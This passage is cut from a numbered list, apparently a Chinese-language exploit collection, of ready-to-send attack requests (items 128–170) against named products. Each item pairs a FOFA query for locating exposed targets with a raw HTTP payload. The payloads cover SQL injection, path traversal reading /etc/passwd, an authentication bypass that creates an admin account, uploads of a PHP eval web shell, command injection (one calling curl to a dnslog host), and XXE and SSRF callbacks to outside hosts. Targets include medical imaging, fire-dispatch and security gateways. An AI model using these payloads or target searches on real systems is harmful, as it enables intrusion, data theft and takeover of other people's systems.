Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier), and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute (base64-encoded).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass (template injection)
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 (smart parking fee collection system) Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field sets the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
